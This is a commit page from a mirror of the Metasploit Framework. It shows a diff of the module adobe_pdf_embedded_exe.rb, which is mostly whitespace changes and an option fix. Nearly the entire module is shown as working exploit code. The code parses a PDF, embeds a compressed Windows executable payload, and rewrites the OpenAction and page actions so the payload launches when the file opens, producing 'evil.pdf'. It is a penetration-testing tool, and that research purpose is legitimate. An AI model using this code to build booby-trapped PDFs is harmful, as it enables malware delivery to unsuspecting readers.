infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixes #472. This module still needs alot of work, but this solves this particular bug. Caused by unsetting the variable 

git-svn-id: file:///home/svn/framework3/trunk@7396 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-11-06 21:16:56 +00:00
parent 0fe06c614f
commit 1d5f1e5f69
1 changed files with 61 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

122
modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
View File

@ -2,7 +2,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::PDF_Parse
include Msf::Exploit::FILEFORMAT
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'License' => MSF_LICENSE,
'Author' => [ 'Colin Ames <amesc[at]attackresearch.com>' ],
'Payload' =>
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
@ -28,21 +28,21 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English)', { 'Ret' => '' } ]
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('INFILENAME', [ false, 'The Input PDF filename.', 'msf.pdf']),
OptString.new('EXENAME', [ false, 'The Name of payload exe.', '']),
OptString.new('INFILENAME', [ true, 'The Input PDF filename.']),
OptString.new('EXENAME', [ false, 'The Name of payload exe.']),
OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),
OptString.new('OUTPUTPATH', [ false, 'The location to output the file.', './data/exploits/']),
], self.class)
end
def exploit
file_name = datastore['INFILENAME']
exe_name = datastore['EXENAME']
print_status("Reading in '#{file_name}'...")
stream = read_pdf()
print_status("Parsing '#{file_name}'...")
@ -53,19 +53,19 @@ class Metasploit3 < Msf::Exploit::Remote
startxrefs = pdf_objects[2]
root_obj = pdf_objects[3]
output = basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxrefs.last)
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(output)
end
def ef_payload(pdf_name,payload_exe,obj_num)
if payload_exe.empty?
if !(payload_exe and payload_exe.length > 0)
print_status("Using '#{datastore['PAYLOAD']}' as payload...")
payload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded)
file_size = payload_exe.length
stream = Rex::Text.zlib_deflate(payload_exe)
@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote
file_size = File.size(payload_exe)
stream = Rex::Text.zlib_deflate(IO.read(payload_exe))
md5 = Rex::Text.md5(File.read(payload_exe))
end
output = String.new()
output << "#{obj_num.to_i + 1} 0 obj\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
output << "#{obj_num.to_i + 2} 0 obj\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>stream\r#{stream}\r\nendstream\rendobj\r"
return output
end
def js_payload(pdf_name,obj_num)
output = String.new()
@ -101,20 +101,20 @@ class Metasploit3 < Msf::Exploit::Remote
def basic_social_engineering_exploit(xref_trailers,root_obj,stream,trailers,file_name,exe_name,startxref)
file_name = file_name.split(/\//).pop.to_s
match = file_name.match(/(.+)\.pdf/)
if match
pdf_name = match[1]
end
catalog = parse_object(xref_trailers,root_obj,stream)
match = catalog.match(/Names (\d+ \d) R/m)
if match
names = parse_object(xref_trailers,match[1],stream)
match = names.match(/EmbeddedFiles (\d+ \d) R/m)
if match
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
match = catalog.match(/OpenAction (\d+ \d) R/m)
if match
open_action = "#{match[1]} R"
if new_catalog
if new_embedded_files
new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
new_catalog = catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch("Size").to_i + 3} 0 R")
end
end
else
else
if new_catalog
if new_embedded_files
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
else
new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 4} 0 R")
end
else
if new_embedded_files
new_catalog = catalog.gsub(/(Pages \d+ \d R)/m,'\1' + "/OpenAction #{trailers[0].fetch("Size").to_i + 2} 0 R")
@ -184,23 +184,23 @@ class Metasploit3 < Msf::Exploit::Remote
pages_obj = catalog.match(/Pages (\d+ \d) R/m)[1]
pages = parse_object(xref_trailers,pages_obj,stream)
page_obj = pages.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)[1]
page = parse_object(xref_trailers,page_obj,stream)
match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)
while match
page_obj = match[1]
page = parse_object(xref_trailers,page_obj,stream)
match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)
end
match = page.match(/AA<<\/O (\d+ \d) R/m)
if match
aa = parse_object(xref_trailers,match[1],stream)
end
new_pdf = String.new()
xrefs = String.new()
@ -211,12 +211,12 @@ class Metasploit3 < Msf::Exploit::Remote
num = trailers[0].fetch("Size").to_i - 1
pdf_payload << ef_payload(pdf_name,exe_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")
new_size = trailers[0].fetch("Size").to_i + 4
if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d R(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 3} 0" + '\2')
else
@ -224,14 +224,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
new_pdf << new_embedded_files
xrefs << xref_create(new_pdf,(new_pdf.length - new_embedded_files.length), "1")
if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
@ -246,12 +246,12 @@ class Metasploit3 < Msf::Exploit::Remote
pdf_payload << "#{num} 0 obj\r<</Names[(\xfe\xff#{Rex::Text.to_unicode(pdf_name,"utf-16be")})#{num + 1} 0 R]>>\rendobj\r"
pdf_payload << ef_payload(pdf_name,exe_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")
new_size = trailers[0].fetch("Size").to_i + 5
if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 4} 0" + '\2')
else
@ -259,14 +259,14 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
new_pdf << new_names
xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), "1")
if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
@ -274,8 +274,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_names.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
else
pdf_payload = String.new()
num = trailers[0].fetch("Size").to_i + 1
@ -283,23 +283,23 @@ class Metasploit3 < Msf::Exploit::Remote
pdf_payload << "#{num} 0 obj\r<</Names[(#{pdf_name})#{num + 1} 0 R]>>\rendobj\r"
pdf_payload << ef_payload(pdf_name,exe_name,num)
pdf_payload << js_payload(pdf_name,num)
new_pdf << stream << pdf_payload
new_pdf << stream << pdf_payload
xrefs = xref_create(new_pdf,stream.length,"*")
new_size = trailers[0].fetch("Size").to_i + 6
if aa
new_page = page.gsub(/(AA<<\/O )\d+ \d(.*)/m,'\1' + "#{trailers[0].fetch("Size").to_i + 5} 0" + '\2')
else
new_page = page.gsub(/(>> *\r?\n? *endobj)/m,"/AA<<\/O #{trailers[0].fetch("Size").to_i + 5} 0 R>>" + '\1')
end
new_pdf << new_catalog
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), "1")
new_pdf << new_page
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), "1")
if trailers[0].has_key?("ID")
new_pdf << "xref\r\n" << xrefs << "trailer\r\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch("Root")} R/Info #{trailers[0].fetch("Info")} R/ID#{trailers[0].fetch("ID")}>>\r\n"
else
@ -307,12 +307,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n"
end
return new_pdf
end
end
end